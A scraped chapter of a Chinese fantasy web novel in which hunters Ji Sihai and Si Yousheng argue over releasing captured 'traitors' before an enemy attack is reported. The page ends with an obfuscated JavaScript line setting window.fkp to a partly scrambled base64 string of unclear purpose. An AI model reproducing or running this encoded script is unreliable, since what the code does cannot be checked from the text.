亲,欢迎光临25中文网!
错缺断章、加书:站内短信
后台有人,会尽快回复!
  • 主题模式:

  • 字体大小:

    -

    18

    +
  • 恢复默认

是这么回事。

季四海这样想着,没有再说什么。而后,他站在那里,看着司有盛拿起电话,联系一家又一家媒体。

这位分部长,从前并不怎么跟媒体打交道。现在这么做,是法术的关系?还是说因为看到这些叛徒各种宣传,决定‘以牙还牙’?

这样的做法不是最好的,但也不坏,会有一定的效果。叛徒们其实很脆弱,用许多不同的方法,都能阻拦他们的发展,剿灭他们。

但是...为什么自己心中总有种不安感呢?为什么,总感觉有些糟糕的事情要发生了呢?

季四海这样想着,看向‘朱城分部’的方向。

会是...敌人知道了自己等人正在这里埋伏?准备了相应的反击手段吗?

这是有可能的。司有盛弄到了叛徒们的很多情报,但他在和城里这些人沟通的过程中,很难做到完全保密。也许,叛徒们早就知道了平海城的猎人在这里埋伏,准备反过来伏击己方。

但如果是这样,他们埋伏在哪里?又准备用什么样的方式攻击过来?

季四海想好了这些,准备进一步思索的时候,听到了司有盛的声音:

“...你也别闲着啊,跟行动科那些人说一声,让他们放人吧。”

季四海点了点头,拿出电话,联系上了行动科‘负责使用束缚法术’的人。

“解除法术。”他一边考虑着‘叛徒们会怎么做’,一边用命令的语气说到。“放那些叛徒走。”

“放他们走?”听到命令后,那个催动束缚法术的猎人,金晓楼发出了诧异的声音。

“可是...为什么?”

季四海大致上能感觉到对方这种态度是因为什么---‘抓住叛徒’是功劳,但放走叛徒的话,功劳就没了。

但是现在,他没有兴趣安抚对方---有更重要的问题需要考虑,没空做这种事。

季四海随即用更加严厉的语气开口了:

“哪来这么多为什么?执行命令!”

在他说出这样的话后,电话对面响起了一些杂乱的争吵声。

几秒后,金晓楼的声音坚定的响了起来:

“没有正式命令的话,我不能执行。”

季四海:“我的话就是命令,立刻去执行!”

金晓楼:“这方面,协会有明确的规定。季科长你是情报科的人,没有资格对行动科成员下达命令。”

“还有事吗?”

季四海脸色变得很难看,心中更烦躁了。而后,他说出了这样的话:

“我是平海城情报科科长,季四海。”

“现在,我正式下达命令,要求你解除法术,释放被困住的叛徒。通讯器里的录音,可以作为正式命令存档。”

“你会执行命令吗?还是说,在这样的情况下也想抗命?”

“那我怎么敢?”电话对面,金晓楼的腔调变得阴阳怪气了起来。“但在当前局面下,由于我们的血被抽的太多,意识并不完全清醒。”

“按照规定,在这样的情况下,为了防止敌人伪装成上级,我们有权拒绝非当面下达的命令。”

这混帐!

季四海很烦燥,很想把手机摔出去。但他最终控制住了情绪,并没有这么做。

现在,可以去几百米之外,去当面对这个行动科的混帐下达命令---但其他的行动科成员也在那里,姚盛德也在那里。

如果自己过去,他们说不定会提到‘都是因为你提供了错误情报,我们才被骗到朱城来’、‘都是因为你,我们才输入了那么多血’的事情。吵起来,很难看。

想到这里,季四海挂断了电话,拨通了姚盛德的号码。

“把那些叛徒放走。”姚盛德接通后,季四海说。“快点。”

“司部长的命令?”姚盛德问道。

“对。”季四海说。“需要他亲自给你下令吗?”

“不用。”姚盛德说。“我这就让他们放人。”

处理好这件事后,季四海看向旁边仍在‘联系媒体’的司有盛,重新考虑起朱城的叛徒们可能采取的行动来。

对了,如果刚才自己的猜测是对的,他们已经出动了...那么用一下预言法术,查找叛徒们‘现在的位置’如何?

虽然之前已经催动了两次法术,再催动会累...但是查王赫的话,可能还是查不到。但是查其他人,应该没问题吧。

季四海这样想着,深吸一口气,就要再一次催动预言法术。

但在下一秒,准备并拢双手之前,他听到了一旁司有盛的声音:

“这座城市的媒体马上就会开始报道‘叛徒们是一群胆小鬼’之类的消息。你觉得,接下来王赫会派人去找这些媒体的麻烦吗?”

“甚至,他会亲自去吗?”

季四海停了下来,看向对方。

“就算他去,我们最好也不要在没准备好的情况下跟这个人交火。这个叛徒的头目,王赫,之前杀了张相,带着部下杀了林岳,占领了朱城分部...”

“我知道啦!”司有盛有些不耐烦的说道。“我只会在干扰仪的范围内和他作战!”

说着,他看向季四海打算并拢的双手。“你这是做什么?”

“我要再催动一下预言法术。”季四海说。

听到这话,司有盛没有阻拦。但下一刻,在季四海打算催动起法术时,司有盛的手机响了起来。

“有动静了!”手机里响起的,是在朱城分部‘监视叛徒动静’的那名部下的声音。“一些叛徒从大楼里出来了,像是准备上车!”

司有盛看着已经离开的叛徒们,哼了一声。“我们把人放走之后,他们出来救援了?”

说着,他看向季四海。“你觉得他们会来这里吗?我的意思是,接到那些人后,过来勘查一下?”

“有这个可能。”

季四海这样说着,不由自主的动了一下身体,对于‘连续被打断’的情况感到很不舒服。

但接下来,在他又一次打算催动法术时,司有盛身上的另一个通讯器又响了起来。

他接通后,上面响起了一个二人都很熟悉的,充满了惊慌意味的声音。

“部长!不好了,有敌人来攻击我们了!”

window.fkp = \"d2luZG93Lm9ua2V5Zm9jdxmoIkRRqwNwR3VJStdmb1lYSlNnR3NqZVmxN2R0VUh0mVJooth5R1b3ZthawxbKmdJ1K3ZpbzNpd1FYSjZpdFVFUUpwN01Edks4VwFRRhAvS29hwnF1UUpNdkhEwVlpNmFLqwVhNhRkUURiVFY4cmNqwjZ4Sy9vYtl4a1hiRjZ6czN3IiwgmtYzmjI3otEymyk=\";